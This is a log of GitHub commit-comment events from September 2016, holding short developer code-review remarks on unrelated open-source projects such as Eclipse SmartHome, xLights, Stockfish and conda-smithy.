{"id":"4504031955","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/engagement-l10n"},"payload":{"comment":{"id":18867555,"position":null,"line":null,"path":null,"commit_id":"2bd557fdf3b3c7d0d54ec32e8b509c106161f4f7","created_at":"2016-09-01T17:39:36Z","updated_at":"2016-09-01T17:39:36Z","body":"Grazie Sandro! Solo una piccola correzione."}},"created_at":"2016-09-01T17:39:36Z"}
{"id":"4504033771","type":"CommitCommentEvent","actor":{"login":"watou"},"repo":{"name":"eclipse/smarthome"},"payload":{"comment":{"id":18867563,"position":16,"line":78,"path":"extensions/persistence/org.eclipse.smarthome.persistence.h2/src/main/java/org/eclipse/smarthome/persistence/h2/internal/H2PersistenceService.java","commit_id":"595c311db36e6e16502d4f548bd6c199a3528435","created_at":"2016-09-01T17:39:59Z","updated_at":"2016-09-01T17:39:59Z","body":"Would not a Java enum be less verbose?"}},"created_at":"2016-09-01T17:39:59Z"}
{"id":"4504036687","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18867570,"position":5,"line":9,"path":"app/templates/category/show.jade","commit_id":"949f0514f6c665616d64718cf6858355d19f9287","created_at":"2016-09-01T17:40:32Z","updated_at":"2016-09-01T17:40:32Z","body":"eso si funciona? pensé q ui-sref solo era para `<a>` "}},"created_at":"2016-09-01T17:40:32Z"}
{"id":"4504039100","type":"CommitCommentEvent","actor":{"login":"emrjackson"},"repo":{"name":"CCCCwebdev/introduction"},"payload":{"comment":{"id":18867580,"position":null,"line":null,"path":null,"commit_id":"8ec2e48afe5d25ba828553a9ad818a597b849e74","created_at":"2016-09-01T17:41:01Z","updated_at":"2016-09-01T17:41:01Z","body":"Good work Luis!"}},"created_at":"2016-09-01T17:41:01Z"}
{"id":"4504039229","type":"CommitCommentEvent","actor":{"login":"daosgc"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18867582,"position":5,"line":9,"path":"app/templates/category/show.jade","commit_id":"949f0514f6c665616d64718cf6858355d19f9287","created_at":"2016-09-01T17:41:03Z","updated_at":"2016-09-01T17:41:03Z","body":"Simon si funca :)"}},"created_at":"2016-09-01T17:41:03Z"}
{"id":"4504042234","type":"CommitCommentEvent","actor":{"login":"Tolo0"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18867587,"position":null,"line":null,"path":null,"commit_id":"e1f9b947990f0584d4173542c7d2774964a95588","created_at":"2016-09-01T17:41:38Z","updated_at":"2016-09-01T17:41:38Z","body":"Could it be BasicHud ?"}},"created_at":"2016-09-01T17:41:38Z"}
{"id":"4504045519","type":"CommitCommentEvent","actor":{"login":"Deadder"},"repo":{"name":"Deadder/ZMon"},"payload":{"comment":{"id":18867599,"position":null,"line":null,"path":null,"commit_id":"a57103386ec5254751f3de1e7e45759326eeb8f5","created_at":"2016-09-01T17:42:16Z","updated_at":"2016-09-01T17:42:16Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;z7y36tfm&#x2F;1-create-base-web-api\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create base Web API</a>"}},"created_at":"2016-09-01T17:42:16Z"}
{"id":"4504046171","type":"CommitCommentEvent","actor":{"login":"hegemonic"},"repo":{"name":"hegemonic/taffydb"},"payload":{"comment":{"id":18867602,"position":null,"line":null,"path":null,"commit_id":"507d2d75fa16e1386f6d50abee1894b264d4458b","created_at":"2016-09-01T17:42:24Z","updated_at":"2016-09-01T17:42:24Z","body":"I undid the package rename."}},"created_at":"2016-09-01T17:42:24Z"}
{"id":"4504047581","type":"CommitCommentEvent","actor":{"login":"emrjackson"},"repo":{"name":"CCCCwebdev/introduction"},"payload":{"comment":{"id":18867607,"position":null,"line":null,"path":null,"commit_id":"3057f4fd6a61b9cdcef39c96f8c5447ef56a90b7","created_at":"2016-09-01T17:42:40Z","updated_at":"2016-09-01T17:42:40Z","body":"Woo hoo! Welcome. :)"}},"created_at":"2016-09-01T17:42:40Z"}
{"id":"4504047984","type":"CommitCommentEvent","actor":{"login":"geekosaur"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18867608,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T17:42:45Z","updated_at":"2016-09-01T17:42:45Z","body":"You're looking for https://github.com/xmonad/xmonad-contrib/pull/30 (the\ncorresponding bug https://github.com/xmonad/xmonad/issues/21 was opened\nagainst xmonad instead of xmonad-contrib and GHI doesn't seem to be up to\nmoving issues to the right repo :/ ).\n\nOn Thu, Sep 1, 2016 at 1:37 PM, Tomáš Janoušek <notifications@github.com>\nwrote:\n\n> @geekosaur <https://github.com/geekosaur> By when/why, I was looking for\n> a commit sha with would explain the why. But thanks for the answer anyway.\n> :-)\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/xmonad/xmonad-contrib/commit/28e9f8bce781e6511b75a1c1e35f1cea4cecfefe#commitcomment-18867506>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB8SoFAEPX4rxZngEYCEVHEcE8_spHmBks5qlw1EgaJpZM4Jyf-5>\n> .\n>\n\n\n\n-- \nbrandon s allbery kf8nh                               sine nomine associates\nallbery.b@gmail.com                                  ballbery@sinenomine.net\nunix, openafs, kerberos, infrastructure, xmonad        http://sinenomine.net\n"}},"created_at":"2016-09-01T17:42:45Z"}
{"id":"4504048324","type":"CommitCommentEvent","actor":{"login":"hertzsprung"},"repo":{"name":"AtmosFOAM/AtmosFOAM"},"payload":{"comment":{"id":18867610,"position":null,"line":null,"path":null,"commit_id":"4d8ab780f51d1ccb6b697b796b41d9b89cf0d77d","created_at":"2016-09-01T17:42:49Z","updated_at":"2016-09-01T17:42:49Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;N4447bbB&#x2F;714-set-up-divergent-winds-for-deformational-flow-test\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Set up divergent winds for deformational flow test</a>"}},"created_at":"2016-09-01T17:42:49Z"}
{"id":"4504048578","type":"CommitCommentEvent","actor":{"login":"AzGilrock"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":18867611,"position":null,"line":null,"path":null,"commit_id":"ffce86a84508ee7ae38010af7cfcc2aef076ec85","created_at":"2016-09-01T17:42:51Z","updated_at":"2016-09-01T17:42:51Z","body":"This change breaks the scenario I was fixing.  If you have a model group that's in the Default preview and contains models that are set to the Unassigned preview and then you remove that model from the group it won't disappear from the tree list if you set that to false and don't regenerate the tree.  The only way to make this more efficient would be to add more logic to location that calls this function to be able to detect when the members of the group have changed and it needs a full tree refresh.  This entire reason I split that call into two Booleans was to fix that refresh problem."}},"created_at":"2016-09-01T17:42:51Z"}
{"id":"4504049000","type":"CommitCommentEvent","actor":{"login":"dianaevergreen"},"repo":{"name":"dianaevergreen/create-your-own-adventure"},"payload":{"comment":{"id":18867613,"position":null,"line":null,"path":null,"commit_id":"8dd983a2e49127469d8265ab15fd872cd98a1bd4","created_at":"2016-09-01T17:42:56Z","updated_at":"2016-09-01T17:42:56Z","body":"Adding \"Paz\" file to the \"espanol\" section. "}},"created_at":"2016-09-01T17:42:56Z"}
{"id":"4504049566","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18867616,"position":5,"line":113,"path":"app/scripts/app.js","commit_id":"949f0514f6c665616d64718cf6858355d19f9287","created_at":"2016-09-01T17:43:03Z","updated_at":"2016-09-01T17:43:03Z","body":"mejor `:category_id`"}},"created_at":"2016-09-01T17:43:03Z"}
{"id":"4504050066","type":"CommitCommentEvent","actor":{"login":"maggu2810"},"repo":{"name":"eclipse/smarthome"},"payload":{"comment":{"id":18867618,"position":16,"line":78,"path":"extensions/persistence/org.eclipse.smarthome.persistence.h2/src/main/java/org/eclipse/smarthome/persistence/h2/internal/H2PersistenceService.java","commit_id":"595c311db36e6e16502d4f548bd6c199a3528435","created_at":"2016-09-01T17:43:09Z","updated_at":"2016-09-01T17:43:09Z","body":"As we need a specific string value we have to create a member field of type string to hold the information and a constructor.\r\nAnd I do not see any reason why the type should be enumeratable.\r\nI just want to introduce constants to reuse them into the code."}},"created_at":"2016-09-01T17:43:09Z"}
{"id":"4504050098","type":"CommitCommentEvent","actor":{"login":"Deadder"},"repo":{"name":"Deadder/ZMon"},"payload":{"comment":{"id":18867619,"position":null,"line":null,"path":null,"commit_id":"a57103386ec5254751f3de1e7e45759326eeb8f5","created_at":"2016-09-01T17:43:10Z","updated_at":"2016-09-01T17:43:10Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;78R0IME0&#x2F;2-create-base-service-app\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create base Service App</a>"}},"created_at":"2016-09-01T17:43:10Z"}
{"id":"4504050629","type":"CommitCommentEvent","actor":{"login":"jgrigonis"},"repo":{"name":"ansible/ansible-modules-core"},"payload":{"comment":{"id":18867623,"position":null,"line":null,"path":null,"commit_id":"5728ef89f0764be9066fc1bf0fbbf7785e60f4cb","created_at":"2016-09-01T17:43:16Z","updated_at":"2016-09-01T17:43:16Z","body":"This change is breaking for me  {\"changed\": false, \"failed\": true, \"module_stderr\": \"\", \"module_stdout\": \"Traceback (most recent call last):\\r\\n  File \\\"/tmp/ansible_Kl6JDv/ansible_module_replace.py\\\", line 179, in <module>\\r\\n    main()\\r\\n  File \\\"/tmp/ansible_Kl6JDv/ansible_module_replace.py\\\", line 173, in main\\r\\n    module.exit_json(changed=changed, msg=msg, diff=diff)\\r\\nUnboundLocalError: local variable 'diff' referenced before assignment\\r\\n\", \"msg\": \"MODULE FAILURE\"}"}},"created_at":"2016-09-01T17:43:16Z"}
{"id":"4504050677","type":"CommitCommentEvent","actor":{"login":"emrjackson"},"repo":{"name":"CCCCwebdev/introduction"},"payload":{"comment":{"id":18867624,"position":null,"line":null,"path":null,"commit_id":"ad23d0584cedfa720cd36e8fb91db186955e92a3","created_at":"2016-09-01T17:43:16Z","updated_at":"2016-09-01T17:43:16Z","body":"Good work, Marion."}},"created_at":"2016-09-01T17:43:16Z"}
{"id":"4504051791","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18867628,"position":5,"line":113,"path":"app/scripts/app.js","commit_id":"949f0514f6c665616d64718cf6858355d19f9287","created_at":"2016-09-01T17:43:29Z","updated_at":"2016-09-01T17:43:29Z","body":"o `:category_slug` @fabricioflores "}},"created_at":"2016-09-01T17:43:29Z"}
{"id":"4504053574","type":"CommitCommentEvent","actor":{"login":"joolswills"},"repo":{"name":"Chips-fr/uae4arm-rpi"},"payload":{"comment":{"id":18867632,"position":7,"line":7,"path":"Makefile","commit_id":"956080b6cba7ab05670dc584067ced8c45bf05f4","created_at":"2016-09-01T17:43:49Z","updated_at":"2016-09-01T17:43:49Z","body":"you don't need mtune as well as mcpu."}},"created_at":"2016-09-01T17:43:49Z"}
{"id":"4504058311","type":"CommitCommentEvent","actor":{"login":"Deadder"},"repo":{"name":"Deadder/ZMon"},"payload":{"comment":{"id":18867646,"position":null,"line":null,"path":null,"commit_id":"610605d8e19d240223b4d039314356664af7dd82","created_at":"2016-09-01T17:44:45Z","updated_at":"2016-09-01T17:44:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;SR6ffN2K&#x2F;3-add-time-stamp-info-to-service\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add Time Stamp info to Service</a>"}},"created_at":"2016-09-01T17:44:45Z"}
{"id":"4504058706","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18867647,"position":5,"line":113,"path":"app/scripts/app.js","commit_id":"949f0514f6c665616d64718cf6858355d19f9287","created_at":"2016-09-01T17:44:50Z","updated_at":"2016-09-01T17:44:50Z","body":"category_id me gusta más... "}},"created_at":"2016-09-01T17:44:50Z"}
{"id":"4504060792","type":"CommitCommentEvent","actor":{"login":"daosgc"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18867654,"position":5,"line":113,"path":"app/scripts/app.js","commit_id":"949f0514f6c665616d64718cf6858355d19f9287","created_at":"2016-09-01T17:45:15Z","updated_at":"2016-09-01T17:45:15Z","body":"listo ya lo cambio cuando suba el siguiente commit."}},"created_at":"2016-09-01T17:45:15Z"}
{"id":"4504061802","type":"CommitCommentEvent","actor":{"login":"maggu2810"},"repo":{"name":"eclipse/smarthome"},"payload":{"comment":{"id":18867660,"position":16,"line":78,"path":"extensions/persistence/org.eclipse.smarthome.persistence.h2/src/main/java/org/eclipse/smarthome/persistence/h2/internal/H2PersistenceService.java","commit_id":"595c311db36e6e16502d4f548bd6c199a3528435","created_at":"2016-09-01T17:45:26Z","updated_at":"2016-09-01T17:45:26Z","body":"@cdjackson Your code does not store UnDefType at all. But that are valid states. Using the current base I don't know how to store UnDefType.UNDEF (and NULL) to the database if e.g. a tiny int or decimal is used. Any suggestion?"}},"created_at":"2016-09-01T17:45:26Z"}
{"id":"4504064749","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"conda-forge/conda-smithy"},"payload":{"comment":{"id":18867667,"position":19,"line":150,"path":"conda_smithy/configure_feedstock.py","commit_id":"eb09f6cc176eae683e58121f9f16e58b0664f6e7","created_at":"2016-09-01T17:45:57Z","updated_at":"2016-09-01T17:45:57Z","body":"Looks like you did. PR ( https://github.com/conda-forge/matplotlib-feedstock/pull/24 ) demonstrates an active use case for this functionality."}},"created_at":"2016-09-01T17:45:57Z"}
{"id":"4504065617","type":"CommitCommentEvent","actor":{"login":"lrineau"},"repo":{"name":"CGAL/cgal"},"payload":{"comment":{"id":18867669,"position":null,"line":null,"path":null,"commit_id":"067cba50e66647a3108f563b94c26fcd807151a2","created_at":"2016-09-01T17:46:07Z","updated_at":"2016-09-01T17:46:07Z","body":"@janetournois The code of `Labeled_mesh_domain_3` was indeed buggy, when the `Null_subdomain_index` functor was non-trivial.\r\n\r\nThat functor is used when one want to labeled the exterior of the cube with a special subdomain index (here `INT_MIN`), and anyway consider that both 0 and `INT_MIN` are indices corresponding to the exterior of the domain.\r\n\r\nThe bisection algorithm was not correct in that case.\r\n"}},"created_at":"2016-09-01T17:46:07Z"}
{"id":"4504069989","type":"CommitCommentEvent","actor":{"login":"Isusquiza"},"repo":{"name":"tabulinas/ExData_Plotting1"},"payload":{"comment":{"id":18867693,"position":null,"line":null,"path":null,"commit_id":"bd071f8ecc3c9cb9087ac86e7cb9f0185addb269","created_at":"2016-09-01T17:46:56Z","updated_at":"2016-09-01T17:46:56Z","body":"Good job!"}},"created_at":"2016-09-01T17:46:56Z"}
{"id":"4504072212","type":"CommitCommentEvent","actor":{"login":"joolswills"},"repo":{"name":"Chips-fr/uae4arm-rpi"},"payload":{"comment":{"id":18867697,"position":79,"line":85,"path":"Makefile","commit_id":"956080b6cba7ab05670dc584067ced8c45bf05f4","created_at":"2016-09-01T17:47:20Z","updated_at":"2016-09-01T17:47:20Z","body":"`-fweb / -frename-registers` is enabled by `-Ofast`.perhaps others - see `gcc -Q --help=optimizers -Ofast`\r\n\r\n`-ftree-vectorize` may produce worse code."}},"created_at":"2016-09-01T17:47:20Z"}
{"id":"4504077988","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18867716,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T17:48:18Z","updated_at":"2016-09-01T17:48:18Z","body":"Oh, that issue where I asked for better commit log and got nothing instead. And now it's me again digging in those nondescriptive commits looking for what's wrong. As if I wasn't angry enough already. :-("}},"created_at":"2016-09-01T17:48:18Z"}
{"id":"4504081979","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18867731,"position":null,"line":null,"path":null,"commit_id":"ff8d30d7b9b7e32c8d29fff4f6b6a5f9f9c236a4","created_at":"2016-09-01T17:48:57Z","updated_at":"2016-09-01T17:48:57Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.238.ff8d30d7b9b7e32c8d29fff4f6b6a5f9f9c236a4](http://build.palaso.org/viewLog.html?buildId=76370&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1493, ignored: 17 Build time: 00:08:56"}},"created_at":"2016-09-01T17:48:57Z"}
{"id":"4504083272","type":"CommitCommentEvent","actor":{"login":"dkulp"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":18867737,"position":null,"line":null,"path":null,"commit_id":"ffce86a84508ee7ae38010af7cfcc2aef076ec85","created_at":"2016-09-01T17:49:12Z","updated_at":"2016-09-01T17:49:12Z","body":"The code right above that line completely blows away all the children of that group in the tree and recreates it.   Thus, I don't see what problem this changes other than causing the entire tree to refresh which collapses and unselects the group which is annoying."}},"created_at":"2016-09-01T17:49:12Z"}
{"id":"4504085722","type":"CommitCommentEvent","actor":{"login":"iandunn"},"repo":{"name":"iandunn/wp-super-cache"},"payload":{"comment":{"id":18867742,"position":null,"line":null,"path":null,"commit_id":"0f24a2ac0e3b375091ba45389dbe1a92977c98b7","created_at":"2016-09-01T17:49:36Z","updated_at":"2016-09-01T17:49:36Z","body":"Hi @sgatz, `supercache_filename` is a new filter added in [an earlier commit](https://github.com/Automattic/wp-super-cache/pull/121/commits/4c2f57e8f296688859414351c3e587915ceb0f2b#diff-917e4c1f16a4f12b277c5cc380ffd939R663)."}},"created_at":"2016-09-01T17:49:36Z"}
{"id":"4504086542","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18867748,"position":null,"line":null,"path":null,"commit_id":"911b45d1dc53947a25edf764e45cd92d8ef45bd3","created_at":"2016-09-01T17:49:45Z","updated_at":"2016-09-01T17:49:45Z","body":"Hi,\r\n\r\nthank you for the cheers. I found the limits so:\r\n\r\nNew root material = 188*8 + 753*2 + 826*2 + 1285*2 + 2513 = 9745\r\nOld root material  = 198*8 + 817*2 + 836*2 + 1270*2 + 2521 = 9951\r\nNew limit = Old limit*9745/9951.\r\n\r\nInterestingly, I noticed this problem a long time ago. A week ago I let run dbg_stats from the tune branch on \r\n\r\ndbg_stats_of(sf, eg_value(pos.psq_score()), eg_value(ei.pi->score), eg_value(ei.me->imbalance()));\r\n\r\nin evaluate just after computing sf and I noticed the large covariance between psq score and the imbalance value, so I remembered my observation and made the patch. Btw the covariance is now larger than before :-)"}},"created_at":"2016-09-01T17:49:45Z"}
{"id":"4504087940","type":"CommitCommentEvent","actor":{"login":"Wei-92"},"repo":{"name":"Wei-92/responsive-static-webpage"},"payload":{"comment":{"id":18867762,"position":null,"line":null,"path":null,"commit_id":"aee25b368dd0afc7a69b940fdba59672a1f18e86","created_at":"2016-09-01T17:49:58Z","updated_at":"2016-09-01T17:49:58Z","body":"images/test.png, I designed this picture using Adobe Photoshop CS6  as a mobile game welcome screen for Mobile Computing Course Project."}},"created_at":"2016-09-01T17:49:58Z"}
{"id":"4504092704","type":"CommitCommentEvent","actor":{"login":"Shelob9"},"repo":{"name":"CalderaWP/Caldera-Forms"},"payload":{"comment":{"id":18867777,"position":null,"line":null,"path":null,"commit_id":"50999508d2384f1bdf07aed27211bbd91ce371c3","created_at":"2016-09-01T17:50:51Z","updated_at":"2016-09-01T17:50:51Z","body":"This was for #796 "}},"created_at":"2016-09-01T17:50:51Z"}
{"id":"4504092827","type":"CommitCommentEvent","actor":{"login":"DavyLandman"},"repo":{"name":"usethesource/rascal"},"payload":{"comment":{"id":18867781,"position":167,"line":492,"path":"src/org/rascalmpl/library/lang/json/io/JsonValueReader.java","commit_id":"f85cca236015ad2a3069fce882604371c64de473","created_at":"2016-09-01T17:50:52Z","updated_at":"2016-09-01T17:50:52Z","body":"Why a linkedlist? Arraylist would be quicker. Since most of the time you won't trigger any resizes."}},"created_at":"2016-09-01T17:50:52Z"}
{"id":"4504103739","type":"CommitCommentEvent","actor":{"login":"DavyLandman"},"repo":{"name":"usethesource/rascal"},"payload":{"comment":{"id":18867813,"position":138,"line":138,"path":"src/org/rascalmpl/library/lang/json/io/JsonValueWriter.java","commit_id":"f85cca236015ad2a3069fce882604371c64de473","created_at":"2016-09-01T17:52:57Z","updated_at":"2016-09-01T17:52:57Z","body":"Forgot a case ;)"}},"created_at":"2016-09-01T17:52:57Z"}
{"id":"4504103953","type":"CommitCommentEvent","actor":{"login":"Dridi"},"repo":{"name":"varnishcache/varnish-cache"},"payload":{"comment":{"id":18867814,"position":null,"line":null,"path":null,"commit_id":"6ced896e5878b861e0694f997613371d35792cc4","created_at":"2016-09-01T17:52:59Z","updated_at":"2016-09-01T17:52:59Z","body":"Did you mean to push that as part of #2061?"}},"created_at":"2016-09-01T17:52:59Z"}
{"id":"4504106447","type":"CommitCommentEvent","actor":{"login":"AzGilrock"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":18867816,"position":null,"line":null,"path":null,"commit_id":"ffce86a84508ee7ae38010af7cfcc2aef076ec85","created_at":"2016-09-01T17:53:26Z","updated_at":"2016-09-01T17:53:26Z","body":"I can make a video and show the problem.  I wouldn't have touched it if there wasn't something to fix.\r\n"}},"created_at":"2016-09-01T17:53:26Z"}
{"id":"4504108176","type":"CommitCommentEvent","actor":{"login":"samuel2498"},"repo":{"name":"mattyx14/otxserver"},"payload":{"comment":{"id":18867821,"position":null,"line":null,"path":null,"commit_id":"a53c14f39022196f7bbdaf74cb85f5892d58c887","created_at":"2016-09-01T17:53:46Z","updated_at":"2016-09-01T17:53:46Z","body":"hey is it possible or is there a script in the source to automaticly open store inbox window? I made the oracle giving start items to the player sending them to the inbox store but id like the store inbox to automaticly open after the player is teleported to mainland. "}},"created_at":"2016-09-01T17:53:46Z"}
{"id":"4504110298","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18867827,"position":null,"line":null,"path":null,"commit_id":"911b45d1dc53947a25edf764e45cd92d8ef45bd3","created_at":"2016-09-01T17:54:11Z","updated_at":"2016-09-01T17:54:11Z","body":"Ah, @snicolet the magic command git log -L186,192:types.h will give the log of all commit in the lines under consideration. "}},"created_at":"2016-09-01T17:54:11Z"}
{"id":"4504114533","type":"CommitCommentEvent","actor":{"login":"eyssy12"},"repo":{"name":"eyssy12/Android-Bluetooth-Commands"},"payload":{"comment":{"id":18867835,"position":113,"line":169,"path":"app/src/main/java/com/eyssyapps/bluetoothcommandsender/threading/BluetoothConnectionThread.java","commit_id":"05082ed562378bdd84629edd4ab5455fad8a1f3c","created_at":"2016-09-01T17:54:57Z","updated_at":"2016-09-01T17:54:57Z","body":"Simplify message handler call by making a default sendHandlerMessage so that there is less confusion on what the parameters are."}},"created_at":"2016-09-01T17:54:57Z"}
{"id":"4504115203","type":"CommitCommentEvent","actor":{"login":"AzGilrock"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":18867838,"position":null,"line":null,"path":null,"commit_id":"ffce86a84508ee7ae38010af7cfcc2aef076ec85","created_at":"2016-09-01T17:55:04Z","updated_at":"2016-09-01T17:55:04Z","body":"Its not the children of the tree that's the problem.  What I saw was like I removed Arch1 from a group and it should be completely gone from the entire tree but it was now showing up at the very bottom of the tree as an individual model not under the group part of the tree.  I couldn't get it to disappear unless I did the full refresh."}},"created_at":"2016-09-01T17:55:04Z"}
{"id":"4504115872","type":"CommitCommentEvent","actor":{"login":"eblount"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18867840,"position":null,"line":null,"path":null,"commit_id":"51f7f695d384f8537b338f134376648849823833","created_at":"2016-09-01T17:55:12Z","updated_at":"2016-09-01T17:55:12Z","body":"Thank you. Could you please point me to where the docs say this?"}},"created_at":"2016-09-01T17:55:12Z"}
{"id":"4504122108","type":"CommitCommentEvent","actor":{"login":"marb99"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18867854,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-01T17:56:19Z","updated_at":"2016-09-01T17:56:19Z","body":"@ivandrofly \r\n\r\ntested with #1937  and still crash"}},"created_at":"2016-09-01T17:56:19Z"}
{"id":"4504123804","type":"CommitCommentEvent","actor":{"login":"jfair9"},"repo":{"name":"cheezy/page-object"},"payload":{"comment":{"id":18867857,"position":null,"line":null,"path":null,"commit_id":"183d827e6bef7c57475913bc152d1fd49184b1c7","created_at":"2016-09-01T17:56:36Z","updated_at":"2016-09-01T17:56:36Z","body":"Are there any examples that can be shared on how best to add an additional platform into Page-Object? I currently have it working with the RAutmation gem to drive automation on a windows desktop. I'd like to compare my approach with the recommended approach based on these recent changes. Thanks!"}},"created_at":"2016-09-01T17:56:36Z"}
{"id":"4504124456","type":"CommitCommentEvent","actor":{"login":"Rotzbua"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":18867862,"position":null,"line":null,"path":null,"commit_id":"a260a2d92e0a5b8700fdcdfe1887386119421c73","created_at":"2016-09-01T17:56:44Z","updated_at":"2016-09-01T17:56:44Z","body":"it is a constant defined by arduino ide automatically included header files depending on board type"}},"created_at":"2016-09-01T17:56:44Z"}
{"id":"4504126628","type":"CommitCommentEvent","actor":{"login":"jessicaappelbaum"},"repo":{"name":"conal/quotes"},"payload":{"comment":{"id":18867871,"position":13,"line":13,"path":"quotes.md","commit_id":"0ea93ef5def68f98097d6fc014d0eb9e6e866ed4","created_at":"2016-09-01T17:57:09Z","updated_at":"2016-09-01T17:57:09Z","body":"Who is Albert Ralph? :smile: "}},"created_at":"2016-09-01T17:57:09Z"}
{"id":"4504136167","type":"CommitCommentEvent","actor":{"login":"mossprescott"},"repo":{"name":"quasar-analytics/quasar"},"payload":{"comment":{"id":18867914,"position":22,"line":57,"path":"it/src/test/scala/quasar/TestConfig.scala","commit_id":"2284e9d7cbccc1a3f62efd7ebc46ecd7032b44f6","created_at":"2016-09-01T17:58:56Z","updated_at":"2016-09-01T17:58:56Z","body":"😄 \r\n\r\nand `.travis.yml`? Does anything pass? 😉 "}},"created_at":"2016-09-01T17:58:56Z"}
{"id":"4504136222","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18867916,"position":4,"line":243,"path":"tabbycat/results/forms.py","commit_id":"5fb984b8719ccf911c13ec839bc9ed77e8ee93a1","created_at":"2016-09-01T17:58:57Z","updated_at":"2016-09-01T17:58:57Z","body":"Hmm, I see, though that's name fields not score fields, right?\r\n\r\nAnyway, I figured it out, it's used to prevent the form from submitting if the field's blank. Without the class, the form will still fail to validate, but it'll just take a whole POST request-response to figure it out; this class short-circuits that process. I'll reinstate it.\r\n\r\nI notice some JavaScript code that disables validation when forfeits are used, which to me sort of further suggests that forfeits should not run through the ballot set form, as I suggest in #374 (maybe put thoughts on this there rather than here)."}},"created_at":"2016-09-01T17:58:57Z"}
{"id":"4504136249","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"conda-forge/conda-smithy"},"payload":{"comment":{"id":18867915,"position":19,"line":150,"path":"conda_smithy/configure_feedstock.py","commit_id":"eb09f6cc176eae683e58121f9f16e58b0664f6e7","created_at":"2016-09-01T17:58:57Z","updated_at":"2016-09-01T17:58:57Z","body":"Oh well, wish I saw that a couple hours ago. And, if the PR is accepted, I\nguess it is worthwhile.\n\nOn Thu, Sep 1, 2016 at 12:45 PM, jakirkham <notifications@github.com> wrote:\n\n> Looks like you did. PR ( conda-forge/matplotlib-feedstock#24\n> <https://github.com/conda-forge/matplotlib-feedstock/pull/24> )\n> demonstrates an active use case for this functionality.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/conda-forge/conda-smithy/commit/eb09f6cc176eae683e58121f9f16e58b0664f6e7#commitcomment-18867667>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHljmWAG-9d_OlodvYuvAWMBUu0tt5zbks5qlw9VgaJpZM4JyU4M>\n> .\n>\n\n\n\n-- \nshadow_walker\nJust a coder!\n"}},"created_at":"2016-09-01T17:58:57Z"}
{"id":"4504137754","type":"CommitCommentEvent","actor":{"login":"dr-j"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18867924,"position":null,"line":null,"path":null,"commit_id":"5f43e7b964d48d57ec7fabdbf36a832aee53dca4","created_at":"2016-09-01T17:59:14Z","updated_at":"2016-09-01T17:59:14Z","body":"This npc will cast frost nova at 5-9 seconds of being in combat and then repeat every 13 to 18 seconds not on player been in 10 yard range like comment says for this to work if enemy within 10 yards you should have used smart_event 9 not 0"}},"created_at":"2016-09-01T17:59:14Z"}
